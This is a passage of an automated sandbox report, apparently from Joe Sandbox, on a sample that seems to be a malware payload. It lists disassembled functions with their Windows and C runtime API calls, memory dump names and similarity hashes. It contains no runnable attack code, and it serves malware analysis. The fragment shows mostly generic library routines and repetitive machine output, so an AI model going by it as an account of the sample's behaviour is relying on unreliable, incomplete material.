                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF251
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF266
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                            • String ID: TeS$TeS
                                                                                                                            • API String ID: 757275642-3278968961
                                                                                                                            • Opcode ID: bd9df2dca23cd8331c8369d7c4efdcff06f165ada1cac66d8521344b723de5b5
                                                                                                                            • Instruction ID: 9b93e80207c89234d115c3431e76c89cfb3ebec580d4235197ab496171ba5b75
                                                                                                                            • Opcode Fuzzy Hash: bd9df2dca23cd8331c8369d7c4efdcff06f165ada1cac66d8521344b723de5b5
                                                                                                                            • Instruction Fuzzy Hash: 6FD06774D4020DBBCF04EFA5C589CCDBFB8AA04349F40856AAE1597241EA74A3498B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strtok
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446180046-0
                                                                                                                            • Opcode ID: 768958e1ad40911abcd4d278d7b9cf501cd27da42767c45129f46ac406272769
                                                                                                                            • Instruction ID: 259ec4e9878978abf560886af48a686491fe6584adac54ead6fde3604a87719f
                                                                                                                            • Opcode Fuzzy Hash: 768958e1ad40911abcd4d278d7b9cf501cd27da42767c45129f46ac406272769
                                                                                                                            • Instruction Fuzzy Hash: BC81CFB4900206EFEB14DF59C98079EBBF1FF14304F10492EE40657381E3BAAA54CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00482130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974526305-0
                                                                                                                            • Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                                            • Instruction ID: 7398060686e13b2660a8def32edeb3b87e1c8b1daaabfdf85e30cfdfc4ed3a90
                                                                                                                            • Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                                            • Instruction Fuzzy Hash: D251D830A00605ABCB24AFA9CA4456F77B1AF01320F248FAFF835963D0D7B89D518B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0049C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049C6AD
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0049C6DB
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0049C709
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0049C73F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: eebad9548548fa8fb14fc0a00ee59877e6a67020c1b72dc3c7b887970ec1e492
                                                                                                                            • Instruction ID: e7961784598594fc508076d8a1e50e96076bc2878b09f3bcbea49f19e27e69cc
                                                                                                                            • Opcode Fuzzy Hash: eebad9548548fa8fb14fc0a00ee59877e6a67020c1b72dc3c7b887970ec1e492
                                                                                                                            • Instruction Fuzzy Hash: 0031CE30600246AFDF219EA5CC84BAB7FA9BF41350F15847AE854872A0E734EC51DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0046F125
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0046F198
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0046F1A1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0046F1A8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1421093161-0
                                                                                                                            • Opcode ID: af161045fe083b8b3735f7ffdc0a76f1e219b343d12068cf875e4b1ca92937b8
                                                                                                                            • Instruction ID: e030ddfde6c482a8137554f480b67242852a31fb6a3f16ad448db17ff252fd5b
                                                                                                                            • Opcode Fuzzy Hash: af161045fe083b8b3735f7ffdc0a76f1e219b343d12068cf875e4b1ca92937b8
                                                                                                                            • Instruction Fuzzy Hash: 0F314535900104EBDB14AF68DC4ABEF7B78EF06704F10812AF815672C1E7796E49CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00527094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 005270AB
                                                                                                                              • Part of subcall function 005277A0: ___BuildCatchObjectHelper.LIBCMT ref: 005277D2
                                                                                                                              • Part of subcall function 005277A0: ___AdjustPointer.LIBCMT ref: 005277E9
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 005270C2
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 005270D4
                                                                                                                            • CallCatchBlock.LIBCMT ref: 005270F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2901542994-0
                                                                                                                            • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction ID: aa83e36ecf1928e0c829979c4a0a4c0797398d587a358dcc9f9cd6b212a53b62
                                                                                                                            • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                            • Instruction Fuzzy Hash: D8010232000119BBCF12AF55EC09EDA3FAAFF8E714F158014F91862161D332E961EBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004853B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00485007: __getptd_noexit.LIBCMT ref: 00485008
                                                                                                                              • Part of subcall function 00485007: __amsg_exit.LIBCMT ref: 00485015
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485A01
                                                                                                                              • Part of subcall function 00488C96: __calloc_impl.LIBCMT ref: 00488CA5
                                                                                                                            • __lock.LIBCMT ref: 00485A37
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00485A43
                                                                                                                            • __lock.LIBCMT ref: 00485A57
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2580527540-0
                                                                                                                            • Opcode ID: a5201d8d6dce44cfc7f11cb4c3fe1893225cf77f71d12174c504fe12e093c0f6
                                                                                                                            • Instruction ID: 4f10bcbaa1a994ba95705a3ca5f9901736cc9a6652770eb57c27fddcf34c7cfb
                                                                                                                            • Opcode Fuzzy Hash: a5201d8d6dce44cfc7f11cb4c3fe1893225cf77f71d12174c504fe12e093c0f6
                                                                                                                            • Instruction Fuzzy Hash: 6E014071541701EBD724FFAA8442B1D7BE0AF85728F604A4FF4559B2C2CE7C49418B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004A09B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction ID: d5fb4a527ae2fd50d63a95ec52629ce4902c0be0efde536435da304a19ad4a91
                                                                                                                            • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                            • Instruction Fuzzy Hash: 1F01407640024EBFCF125E85CC428EE3F66BB3E354F588416FE1958131C23AC9B2AB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004727A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32 ref: 004727B9
                                                                                                                            • _malloc.LIBCMT ref: 004727C3
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 004727CE
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004727E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: ba6c40985c3acdcca34163e2616274c5fa1b84f182fbba384ba462272f2e5998
                                                                                                                            • Instruction ID: cb95aba7358274ad346eb336a2b2e70f431ca86fbd866e0a79358e66e078d918
                                                                                                                            • Opcode Fuzzy Hash: ba6c40985c3acdcca34163e2616274c5fa1b84f182fbba384ba462272f2e5998
                                                                                                                            • Instruction Fuzzy Hash: EAF02735701204BBE72066659C4FFBF7A9DDF86764F100129B604E32D2EA512D0552F5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32 ref: 00472806
                                                                                                                            • _malloc.LIBCMT ref: 00472814
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _memset.LIBCMT ref: 0047281F
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00472832
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2824100046-0
                                                                                                                            • Opcode ID: 61c08ecc5b938af7da828bfe379d8873654ffa06736869913326384ce959dba2
                                                                                                                            • Instruction ID: 2dff85dbc8a1f8c10c09fa7dd81d56327f55088363b63b2bbc057ff0a88b59cc
                                                                                                                            • Opcode Fuzzy Hash: 61c08ecc5b938af7da828bfe379d8873654ffa06736869913326384ce959dba2
                                                                                                                            • Instruction Fuzzy Hash: 94E086763015247BE520235A6C4FFAF6A1CCFC37A5F100516F611D22E38A941C0692B4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00474920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 6ef144a9db13f2d4f1c3930286c27f614ea270e5d0ffd45c2eed227c2aa20958
                                                                                                                            • Instruction ID: 9f3977e2a26e072fbcdeefb61b6b3eff430cb5414efe151019f6d2d6ee6dad43
                                                                                                                            • Opcode Fuzzy Hash: 6ef144a9db13f2d4f1c3930286c27f614ea270e5d0ffd45c2eed227c2aa20958
                                                                                                                            • Instruction Fuzzy Hash: 12C12B70700619DBCB24CF58D9C09BAB3B6FFC5304B20852EE44A8B655DB34ED56CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00477D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 6d2325827aaeae8850625d2e0ea74bcca7f2cb4f22652f3a9ddbb34e71ab8492
                                                                                                                            • Instruction ID: 1c78b780bf9a620a29811a304f661095fe958588e7493dd73cd188f86a60d4d1
                                                                                                                            • Opcode Fuzzy Hash: 6d2325827aaeae8850625d2e0ea74bcca7f2cb4f22652f3a9ddbb34e71ab8492
                                                                                                                            • Instruction Fuzzy Hash: 4F5180316042099BCF24DF18C9808EA77A6FF85304BA0896EE8598B351D735ED558BE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0047B1BA
                                                                                                                              • Part of subcall function 004711C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0047120F
